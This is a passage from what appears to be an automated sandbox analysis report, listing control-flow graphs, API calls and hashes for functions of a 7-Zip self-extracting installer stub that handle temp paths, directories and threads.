??2@YAPAXI@Z 963->964 965 40f45b-40f460 963->965 971 40f4b4 964->971 972 40f4ab-40f4b2 call 40f776 964->972 968 40f462-40f464 965->968 969 40f468-40f47e call 40f090 call 40ef85 965->969 966->967 984 40f449-40f44b 967->984 985 40f44f-40f451 967->985 968->969 969->964 973 40f4b6-40f4cd call 40ef4a 971->973 972->973 986 40f4db-40f500 call 40faff 973->986 987 40f4cf-40f4d8 973->987 984->985 985->915 991 40f502-40f507 986->991 992 40f543-40f546 986->992 987->986 995 40f509-40f50b 991->995 996 40f50f-40f514 991->996 993 40f54c-40f5a9 call 40f163 call 40f011 call 40e9ef 992->993 994 40f6ae-40f6b3 992->994 1012 40f5ae-40f5b3 993->1012 997 40f6b5-40f6b6 994->997 998 40f6bb-40f6df 994->998 995->996 1000 40f516-40f518 996->1000 1001 40f51c-40f534 call 40f090 call 40ef85 996->1001 997->998 998->915 998->958 1000->1001 1010 40f536-40f538 1001->1010 1011 40f53c-40f53e 1001->1011 1010->1011 1011->915 1013 40f615-40f61b 1012->1013 1014 40f5b5 1012->1014 1016 40f621-40f623 1013->1016 1017 40f61d-40f61f 1013->1017 1015 40f5b7 1014->1015 1018 40f5ba-40f5c3 call 40faac 1015->1018 1019 40f5c5-40f5c7 1016->1019 1020 40f625-40f631 1016->1020 1017->1015 1018->1019 1030 40f602-40f604 1018->1030 1022 40f5c9-40f5ca 1019->1022 1023 40f5cf-40f5d1 1019->1023 1024 40f633-40f635 1020->1024 1025 40f637-40f63d 1020->1025 1022->1023 1027 40f5d3-40f5d5 1023->1027 1028 40f5d9-40f5f1 call 40f090 call 40ef85 1023->1028 1024->1018 1025->998 1029 40f63f-40f645 1025->1029 1027->1028 1028->948 1038 40f5f7-40f5fd 1028->1038 1029->998 1032 40f606-40f608 1030->1032 1033 40f60c-40f610 1030->1033 1032->1033 1033->998 1038->948
                                                    APIs
                                                    • _EH_prolog.MSVCRT ref: 0040F230
                                                    • ??2@YAPAXI@Z.MSVCRT(00000038,00000001), ref: 0040F3CE
                                                    • ??2@YAPAXI@Z.MSVCRT(00000038,00000000,00000001), ref: 0040F4A1
                                                      • Part of subcall function 0040F776: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,?,0040F4B2,00000000,00000001), ref: 0040F79E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: ??2@$H_prolog
                                                    • String ID: pmA${D@
                                                    • API String ID: 3431946709-901781089
                                                    • Opcode ID: 5f2616ad24b74ab3b3c53048b37fa2c0e98c535542d0e7834049dc9cf8634cb0
                                                    • Instruction ID: 4b0d62aee0caa64fe906b0c8bb83bc11348460c21612f4a75cf9423b72749376
                                                    • Opcode Fuzzy Hash: 5f2616ad24b74ab3b3c53048b37fa2c0e98c535542d0e7834049dc9cf8634cb0
                                                    • Instruction Fuzzy Hash: 27F14971600209DFCB24DF65C884AAA77E5BF48314F24417AFC15AB7A2DB39EC4ACB54

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1041 401b75-401b84 CreateDirectoryW 1042 401bb6-401bba 1041->1042 1043 401b86-401b93 GetLastError 1041->1043 1044 401ba0-401bad GetFileAttributesW 1043->1044 1045 401b95 1043->1045 1044->1042 1047 401baf-401bb1 1044->1047 1046 401b96-401b9f SetLastError 1045->1046 1047->1042 1048 401bb3-401bb4 1047->1048 1048->1046
                                                    APIs
                                                    • CreateDirectoryW.KERNELBASE(k7@,00000000,-00000001,0040376B,?,004017CF,?,?,?,?,004017CF,?), ref: 00401B7C
                                                    • GetLastError.KERNEL32(?,?,?,?,004017CF,?), ref: 00401B86
                                                    • SetLastError.KERNEL32(000000B7,?,?,?,?,004017CF,?), ref: 00401B96
                                                    • GetFileAttributesW.KERNELBASE(?,?,?,?,?,004017CF,?), ref: 00401BA4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$AttributesCreateDirectoryFile
                                                    • String ID: k7@
                                                    • API String ID: 635176117-1561861239
                                                    • Opcode ID: 7fa23999d3db3281292cd00d2626ae9ff6d2ad14d17e5580772b07dc82ab3e50
                                                    • Instruction ID: 71014ff69d247b10dec1bc4f18777740662f48cc5fd99e7c756ec1d8f22ae331
                                                    • Opcode Fuzzy Hash: 7fa23999d3db3281292cd00d2626ae9ff6d2ad14d17e5580772b07dc82ab3e50
                                                    • Instruction Fuzzy Hash: 72E04831918510EFDB125B34FC48BDF7B659F85365F908672F459E01F4E3749C428549

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1052 40e9ef-40ea0a call 410a40 1055 40ea19-40ea52 call 406eb0 call 40f707 1052->1055 1056 40ea0c-40ea16 1052->1056 1061 40eb20-40eb46 call 40e79c call 40e6d7 1055->1061 1062 40ea58-40ea62 ??2@YAPAXI@Z 1055->1062 1074 40eb64-40eb7c call 40cdda call 401132 1061->1074 1075 40eb48-40eb5e call 40e2e8 1061->1075 1064 40ea71 1062->1064 1065 40ea64-40ea6f 1062->1065 1066 40ea73-40eaac call 40ef4a ??2@YAPAXI@Z 1064->1066 1065->1066 1072 40eabe 1066->1072 1073 40eaae-40eabc 1066->1073 1076 40eac0-40eaf9 call 40ef4a call 40c350 call 40e45f 1072->1076 1073->1076 1089 40ebb4-40ebc4 1074->1089 1090 40eb7e-40eb8b ??2@YAPAXI@Z 1074->1090 1075->1074 1083 40ece0-40ecf7 1075->1083 1105 40eb01-40eb06 1076->1105 1106 40eafb-40eafd 1076->1106 1094 40ee93-40eeae call 40e27a 1083->1094 1095 40ecfd 1083->1095 1107 40ebf4-40ebfa 1089->1107 1108 40ebc6 1089->1108 1091 40eb96 1090->1091 1092 40eb8d-40eb94 call 40e7c1 1090->1092 1097 40eb98-40eba8 call 40f707 1091->1097 1092->1097 1111 40eeb0-40eeb6 1094->1111 1112 40eeb9-40eebc 1094->1112 1101 40ed00-40ed30 1095->1101 1120 40ebaa-40ebad 1097->1120 1121 40ebaf 1097->1121 1118 40ed60-40eda6 call 40cd11 * 2 1101->1118 1119 40ed32-40ed38 1101->1119 1116 40eb08-40eb0a 1105->1116 1117 40eb0e-40eb1a 1105->1117 1106->1105 1113 40ec00-40ec20 call 40cf2f 1107->1113 1114 40ecce-40ecdd call 40e977 1107->1114 1115 40ebc8-40ebee call 40ce5c call 40e2c5 call 40e42c call 40e4dd 1108->1115 1111->1112 1112->1115 1123 40eec2-40eee9 call 40cd11 1112->1123 1133 40ec25-40ec2d 1113->1133 1114->1083 1115->1107 1116->1117 1117->1061 1117->1062 1163 40ee10 1118->1163 1164 40eda8-40edab 1118->1164 1127 40ee00-40ee02 1119->1127 1128 40ed3e-40ed50 1119->1128 1129 40ebb1 1120->1129 1121->1129 1145 40ef01-40ef1d 1123->1145 1146 40eeeb-40eeff call 4107a2 1123->1146 1139 40ee06-40ee0b 1127->1139 1150 40ed56-40ed58 1128->1150 1151 40edda-40eddc 1128->1151 1129->1089 1137 40ec33-40ec3a 1133->1137 1138 40edca-40edcf 1133->1138 1147 40ec68-40ec6b 1137->1147 1148 40ec3c-40ec40 1137->1148 1141 40edd1-40edd3 1138->1141 1142 40edd7 1138->1142 1139->1115 1141->1142 1142->1151 1217 40ef1e call 40bb40 1145->1217 1218 40ef1e call 40c5e0 1145->1218 1219 40ef1e call 40e17a 1145->1219 1220 40ef1e call 41297c 1145->1220 1146->1145 1152 40ec71-40ec7f call 40f707 1147->1152 1153 40edf9-40edfe 1147->1153 1148->1147 1156 40ec42-40ec45 1148->1156 1150->1118 1159 40ed5a-40ed5c 1150->1159 1160 40ede4-40ede7 1151->1160 1161 40edde-40ede0 1151->1161 1180 40ec81-40ec87 call 413226 1152->1180 1181 40ec8c-40ec9d call 40e45f 1152->1181 1153->1127 1153->1139 1166 40ec4b-40ec59 call 40f707 1156->1166 1167 40edec-40edf1 1156->1167 1157 40ef21-40ef2b call 40ce5c 1157->1115 1159->1118 1160->1115 1161->1160 1169 40ee13-40ee19 1163->1169 1174 40edae-40edc6 call 4107a2 1164->1174 1166->1181 1184 40ec5b-40ec66 call 413201 1166->1184 1167->1139 1173 40edf3-40edf5 1167->1173 1176 40ee64-40ee8d call 40ce5c * 2 1169->1176 1177 40ee1b-40ee27 call 40e558 1169->1177 1173->1153 1189 40edc8 1174->1189 1176->1094 1176->1101 1195 40ee35-40ee41 call 40e5a3 1177->1195 1196 40ee29-40ee33 1177->1196 1180->1181 1197 40eca5-40ecaa 1181->1197 1198 40ec9f-40eca1 1181->1198 1184->1181 1189->1169 1210 40ef30-40ef45 call 40ce5c * 2 1195->1210 1211 40ee47 1195->1211 1202 40ee4a-40ee62 call 4107a2 1196->1202 1199 40ecb2-40ecb7 1197->1199 1200 40ecac-40ecae 1197->1200 1198->1197 1205 40ecb9-40ecbb 1199->1205 1206 40ecbf-40ecc8 1199->1206 1200->1199 1202->1176 1202->1177 1205->1206 1206->1113 1206->1114 1210->1115 1211->1202 1217->1157 1218->1157 1219->1157 1220->1157
                                                    APIs
                                                    • ??2@YAPAXI@Z.MSVCRT(00000018,00000000,?,00000000,?), ref: 0040EA5A
                                                    • ??2@YAPAXI@Z.MSVCRT(00000028,00000000,00000000,?,00000000,?), ref: 0040EAA4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: ??2@
                                                    • String ID: DmA${D@
                                                    • API String ID: 1033339047-1777112864
                                                    • Opcode ID: 0fbc1e047aa24a6cf396f6002696145173c8f9cc79442394acc3b55e615792f3
                                                    • Instruction ID: 6b6f199f6b2a7d9dc60afa7eeb36d7837fa60508d4a378e5edde095099593778
                                                    • Opcode Fuzzy Hash: 0fbc1e047aa24a6cf396f6002696145173c8f9cc79442394acc3b55e615792f3
                                                    • Instruction Fuzzy Hash: 0E120371900249DFCB24DF66C88099ABBB5FF08304B14496EF91AA7391DB39E995CF84

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1221 410ccb-410ce8 call 40e0d0 1224 410e20-410e23 1221->1224 1225 410cee-410cf5 call 41076b 1221->1225 1228 410cf7-410cf9 1225->1228 1229 410cfe-410d2d call 40e036 memcpy 1225->1229 1228->1224 1232 410d30-410d38 1229->1232 1233 410d50-410d68 1232->1233 1234 410d3a-410d48 1232->1234 1240 410d6a-410d6f 1233->1240 1241 410dcf 1233->1241 1235 410dc4-410dcd ??3@YAXPAX@Z 1234->1235 1236 410d4a 1234->1236 1238 410e1e-410e1f 1235->1238 1236->1233 1237 410d4c-410d4e 1236->1237 1237->1233 1237->1235 1238->1224 1243 410d71-410d79 1240->1243 1244 410dd4-410dd7 1240->1244 1242 410dd1-410dd2 1241->1242 1245 410e17-410e1c ??3@YAXPAX@Z 1242->1245 1246 410d7b 1243->1246 1247 410dad-410dbf memmove 1243->1247 1244->1242 1245->1238 1248 410d8a-410d8e 1246->1248 1247->1232 1249 410d90-410d92 1248->1249 1250 410d82-410d84 1248->1250 1249->1247 1252 410d94-410d9d call 41076b 1249->1252 1250->1247 1251 410d86-410d87 1250->1251 1251->1248 1255 410dd9-410e0f memcpy call 40d041 1252->1255 1256 410d9f-410dab 1252->1256 1258 410e12-410e15 1255->1258 1256->1247 1257 410d7d-410d80 1256->1257 1257->1248 1258->1245
                                                    APIs
                                                    • memcpy.MSVCRT(00000000,?,00000020,00010000), ref: 00410D22
                                                    • memmove.MSVCRT(00000000,?,00000020,?,00010000), ref: 00410DB9
                                                    • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00410DC5
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: ??3@memcpymemmove
                                                    • String ID:
                                                    • API String ID: 3549172513-0
                                                    • Opcode ID: 68ec5b1761c5ee7f9fc326a7c1c6742ca84d938ae768d4aa852de07e3c909998
                                                    • Instruction ID: 2e51937533cdabe9fe59c05819b629b516a53c036badf135e90f0136c29b37f2
                                                    • Opcode Fuzzy Hash: 68ec5b1761c5ee7f9fc326a7c1c6742ca84d938ae768d4aa852de07e3c909998
                                                    • Instruction Fuzzy Hash: F141C171A00204ABDB24EAA5D940BFEB7B5FF84704F14446EE846A7341D7B8BEC18B59

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1273 404903-404984 #17 call 413370 call 402131 call 402187 * 7 1292 404989-40499d SHGetSpecialFolderPathW 1273->1292 1293 404a32-404a36 1292->1293 1294 4049a3-4049ed wsprintfW call 401458 * 2 call 401370 * 2 call 4032d9 1292->1294 1293->1292 1295 404a3c-404a40 1293->1295 1305 4049f2-4049f8 1294->1305 1306 404a22-404a28 1305->1306 1307 4049fa-404a1d call 401370 * 2 call 4032d9 1305->1307 1306->1305 1309 404a2a-404a2d call 40269a 1306->1309 1307->1306 1309->1293
                                                    APIs
                                                    • #17.COMCTL32(00000000,00000020,-00000002), ref: 0040490F
                                                      • Part of subcall function 00402131: GetUserDefaultUILanguage.KERNEL32(0040491F), ref: 0040213B
                                                      • Part of subcall function 00402187: GetLastError.KERNEL32(00000000,00000020,-00000002), ref: 004021D6
                                                      • Part of subcall function 00402187: wsprintfW.USER32 ref: 004021E7
                                                      • Part of subcall function 00402187: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 004021FC
                                                      • Part of subcall function 00402187: GetLastError.KERNEL32 ref: 00402201
                                                      • Part of subcall function 00402187: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040221C
                                                      • Part of subcall function 00402187: GetEnvironmentVariableW.KERNEL32(?,00000000,00000004), ref: 0040222F
                                                      • Part of subcall function 00402187: GetLastError.KERNEL32 ref: 00402236
                                                      • Part of subcall function 00402187: lstrcmpiW.KERNEL32(024B4890,00404926), ref: 0040224B
                                                      • Part of subcall function 00402187: ??3@YAXPAX@Z.MSVCRT(024B4890), ref: 0040225B
                                                      • Part of subcall function 00402187: SetLastError.KERNEL32(?), ref: 00402282
                                                      • Part of subcall function 00402187: lstrlenA.KERNEL32(00416208), ref: 004022B6
                                                      • Part of subcall function 00402187: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004022D1
                                                      • Part of subcall function 00402187: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402303
                                                      • Part of subcall function 00402187: ??3@YAXPAX@Z.MSVCRT(00404926), ref: 00402279
                                                      • Part of subcall function 00402187: _wtol.MSVCRT ref: 00402314
                                                      • Part of subcall function 00402187: MultiByteToWideChar.KERNEL32(00000000,00416208,00000001,024B4890,00000002), ref: 00402334
                                                    • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000000,00000000), ref: 00404995
                                                    • wsprintfW.USER32 ref: 004049B0
                                                      • Part of subcall function 004032D9: ??2@YAPAXI@Z.MSVCRT(00000018,00000000,004049F2,?,?,?), ref: 004032DE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$??2@$??3@EnvironmentVariablewsprintf$ByteCharDefaultFolderInfoLanguageLocaleMultiPathSpecialUserWide_wtollstrcmpilstrlen
                                                    • String ID: 7zSfxFolder%02d
                                                    • API String ID: 3387708999-2820892521
                                                    • Opcode ID: 0b64465946cb2e48a0dbd03d6f906f8cc659a125e1421e758d292e165e0ccb9d
                                                    • Instruction ID: 5234f5b279cb727febf32c6091b250cce28905a448a9d0e240f4fe7ebf0ff8ab
                                                    • Opcode Fuzzy Hash: 0b64465946cb2e48a0dbd03d6f906f8cc659a125e1421e758d292e165e0ccb9d
                                                    • Instruction Fuzzy Hash: 2731B471A10205ABCB10FFA1DC9AAEEB768AF40304F00417FFA15B60E1EB784946CB58

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1315 402bee-402c38 call 413660 call 40d041 lstrlenA * 2 1319 402c3d-402c59 call 40d00d 1315->1319 1321 402d29 1319->1321 1322 402c5f-402c64 1319->1322 1323 402d2b-402d2f 1321->1323 1322->1321 1324 402c6a-402c74 1322->1324 1325 402c77-402c7c 1324->1325 1326 402cbb-402cc0 1325->1326 1327 402c7e-402c83 1325->1327 1328 402ce5-402d09 memmove 1326->1328 1330 402cc2-402cd5 memcmp 1326->1330 1327->1328 1329 402c85-402c98 memcmp 1327->1329 1335 402d18-402d23 1328->1335 1336 402d0b-402d12 1328->1336 1331 402d25-402d27 1329->1331 1332 402c9e-402ca8 1329->1332 1333 402cb5-402cb9 1330->1333 1334 402cd7-402ce3 1330->1334 1331->1323 1332->1321 1337 402caa-402cb0 call 40292b 1332->1337 1333->1325 1334->1325 1335->1323 1336->1335 1338 402c3a 1336->1338 1337->1333 1338->1319
                                                    APIs
                                                    • lstrlenA.KERNEL32(?,?,00403D0E,00419858,?,?,00405C1F,00000000,00000000,?,?,?,00000000,-00000002), ref: 00402C20
                                                    • lstrlenA.KERNEL32(?,?,00403D0E,00419858,?,?,00405C1F,00000000,00000000,?,?,?,00000000,-00000002), ref: 00402C28
                                                    • memcmp.MSVCRT(00000000,?,?), ref: 00402C8E
                                                    • memcmp.MSVCRT(00000000,?,?,?,00403D0E,00419858,?,?,00405C1F,00000000,00000000,?,?,?,00000000,-00000002), ref: 00402CCB
                                                    • memmove.MSVCRT(?,?,00000000,?,00403D0E,00419858,?,?,00405C1F,00000000,00000000,?,?,?,00000000,-00000002), ref: 00402CFD
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: lstrlenmemcmp$memmove
                                                    • String ID:
                                                    • API String ID: 3251180759-0
                                                    • Opcode ID: fa32a0385ddd39642fa32be0e776516a86df04650160174833642614f5e9d137
                                                    • Instruction ID: de6905f5b60a3a827beaa0a9a9e283af0395689e13c8cf078280906fc371a6c9
                                                    • Opcode Fuzzy Hash: fa32a0385ddd39642fa32be0e776516a86df04650160174833642614f5e9d137
                                                    • Instruction Fuzzy Hash: A7414972D0424DAFDB11DFA4C9889EEBBB9EF48384F14406AE845B3290D3B49E85CB55

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1342 401611-401667 call 40f707 call 401370 call 401526 CreateThread 1349 401669 call 40851f 1342->1349 1350 40166e-401689 WaitForSingleObject 1342->1350 1349->1350 1352 40168b-40168e 1350->1352 1353 4016bd-4016c3 1350->1353 1356 401690-401693 1352->1356 1357 4016b1 1352->1357 1354 401721 1353->1354 1355 4016c5-4016da GetExitCodeThread 1353->1355 1363 401726-401729 1354->1363 1358 4016e4-4016ef 1355->1358 1359 4016dc-4016de 1355->1359 1360 401695-401698 1356->1360 1361 4016ad-4016af 1356->1361 1362 4016b3-4016bb call 408dbf 1357->1362 1365 4016f1-4016f2 1358->1365 1366 4016f7-401700 1358->1366 1359->1358 1364 4016e0-4016e2 1359->1364 1367 4016a9-4016ab 1360->1367 1368 40169a-40169d 1360->1368 1361->1362 1362->1354 1364->1363 1370 4016f4-4016f5 1365->1370 1371 401702-401709 1366->1371 1372 40170b-401717 SetLastError 1366->1372 1367->1362 1373 4016a4-4016a7 1368->1373 1374 40169f-4016a2 1368->1374 1376 401719-40171e call 408dbf 1370->1376 1371->1354 1371->1372 1372->1376 1373->1370 1374->1354 1374->1373 1376->1354
                                                    APIs
                                                    • CreateThread.KERNELBASE(00000000,00000000,004012E3,00000000,00000000,?), ref: 00401655
                                                    • WaitForSingleObject.KERNEL32(000000FF,?,004017F5,?,?), ref: 00401676
                                                      • Part of subcall function 00408DBF: wvsprintfW.USER32(?,00000000,?), ref: 00408DE3
                                                      • Part of subcall function 00408DBF: GetLastError.KERNEL32 ref: 00408DF4
                                                      • Part of subcall function 00408DBF: FormatMessageW.KERNEL32(00001100,00000000,00000000,?,?,00000000,00406B79), ref: 00408E1C
                                                      • Part of subcall function 00408DBF: FormatMessageW.KERNEL32(00001100,00000000,?,00000000,?,00000000,00406B79), ref: 00408E31
                                                      • Part of subcall function 00408DBF: lstrlenW.KERNEL32(?), ref: 00408E44
                                                      • Part of subcall function 00408DBF: lstrlenW.KERNEL32(?), ref: 00408E4B
                                                      • Part of subcall function 00408DBF: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00408E60
                                                      • Part of subcall function 00408DBF: lstrcpyW.KERNEL32(00000000,?), ref: 00408E76
                                                      • Part of subcall function 00408DBF: lstrcpyW.KERNEL32(-00000002,?), ref: 00408E87
                                                      • Part of subcall function 00408DBF: ??3@YAXPAX@Z.MSVCRT(00000000,00000000), ref: 00408E90
                                                      • Part of subcall function 00408DBF: LocalFree.KERNEL32(?), ref: 00408E9A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: FormatMessagelstrcpylstrlen$??2@??3@CreateErrorFreeLastLocalObjectSingleThreadWaitwvsprintf
                                                    • String ID:
                                                    • API String ID: 359084233-0
                                                    • Opcode ID: 66257497e4407e65e3ec51839b2cc1af24185b4b9cde7a4118d25a0965ef4d55
                                                    • Instruction ID: 99d6c8c0394ba6fc9b9d299436d7c7a44fadaa3de81f278bf7a0439fefe7fe09
                                                    • Opcode Fuzzy Hash: 66257497e4407e65e3ec51839b2cc1af24185b4b9cde7a4118d25a0965ef4d55
                                                    • Instruction Fuzzy Hash: 0D31E131600200FBCA355B54DC95EEB36A8EB81754B28853BF515F62F0DA7A8C829A1E

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1379 404545-404576 call 401458 call 4027aa GetTempPathW 1384 404598-4045a5 1379->1384 1385 404578-404595 call 4027aa GetTempPathW call 40115e 1379->1385 1387 4045a8-4045df call 4027aa wsprintfW call 40115e GetFileAttributesW 1384->1387 1385->1384 1395 4045e1-4045eb 1387->1395 1396 4045ed-4045f3 1387->1396 1395->1387 1395->1396
                                                    APIs
                                                    • GetTempPathW.KERNEL32(00000001,00000000,00000002,00000000,00406D05,00000000,?,?,00405368,?,7ZSfx%03x.cmd), ref: 00404568
                                                    • GetTempPathW.KERNEL32(00000001,00000000,00000001,?,?,00405368,?,7ZSfx%03x.cmd), ref: 00404585
                                                    • wsprintfW.USER32 ref: 004045BB
                                                    • GetFileAttributesW.KERNELBASE(?), ref: 004045D6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: PathTemp$AttributesFilewsprintf
                                                    • String ID:
                                                    • API String ID: 1746483863-0
                                                    • Opcode ID: 0e4a8cbd59d5c8a173ea11c71d2339e4dceea1800af4b6b4e6d7220fd0c99624
                                                    • Instruction ID: 733027a3fcd96ec5c8df4ae3473da8ef02d46a04784f0fe1f39aec502691af17
                                                    • Opcode Fuzzy Hash: 0e4a8cbd59d5c8a173ea11c71d2339e4dceea1800af4b6b4e6d7220fd0c99624
                                                    • Instruction Fuzzy Hash: C1112772500604FFC701AF55CC84AADB7B8FF84314F10802EF946972E1CB799900CB94

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1397 412525-412563 call 40fc0a 1400 412565 call 4105e9 1397->1400 1401 41256a-412598 call 413350 1397->1401 1400->1401 1401->1400 1405 41259a-4125b9 1401->1405 1406 4127a3-4127a7 1405->1406 1407 4125bf-4125c1 1405->1407 1408 4125c3-4125c7 1407->1408 1409 4125c9-4125cc 1407->1409 1408->1409 1410 4125d1-4125d4 1408->1410 1409->1406 1411 4125d6 1410->1411 1412 4125dd-4125ee 1410->1412 1411->1409 1413 4125d8-4125db 1411->1413 1414 4125f0 1412->1414 1415 4125f7-412606 call 40d041 1412->1415 1413->1409 1413->1412 1414->1409 1416 4125f2-4125f5 1414->1416 1417 412609-41260b 1415->1417 1416->1409 1416->1415 1417->1406 1418 412611-41263c call 40e036 call 40e0d0 1417->1418 1423 41264f-412687 call 413350 1418->1423 1424 41263e 1418->1424 1423->1400 1429 41268d-4126c2 call 411603 call 410684 1423->1429 1425 412640-41264a ??3@YAXPAX@Z 1424->1425 1427 4127a2 1425->1427 1427->1406 1434 4126c4-4126c6 1429->1434 1435 4126cc-4126cf 1429->1435 1434->1435 1436 41276c-4127a0 call 411f01 call 410996 call 4115ca ??3@YAXPAX@Z 1434->1436 1435->1400 1437 4126d5-4126d7 1435->1437 1436->1427 1437->1400 1439 4126dd-4126ff call 411c05 1437->1439 1444 412701-412711 call 410996 call 4115ca 1439->1444 1445 412716-41271a 1439->1445 1444->1425 1448 412733-412737 1445->1448 1449 41271c-41272e call 410996 call 4115ca 1445->1449 1448->1400 1454 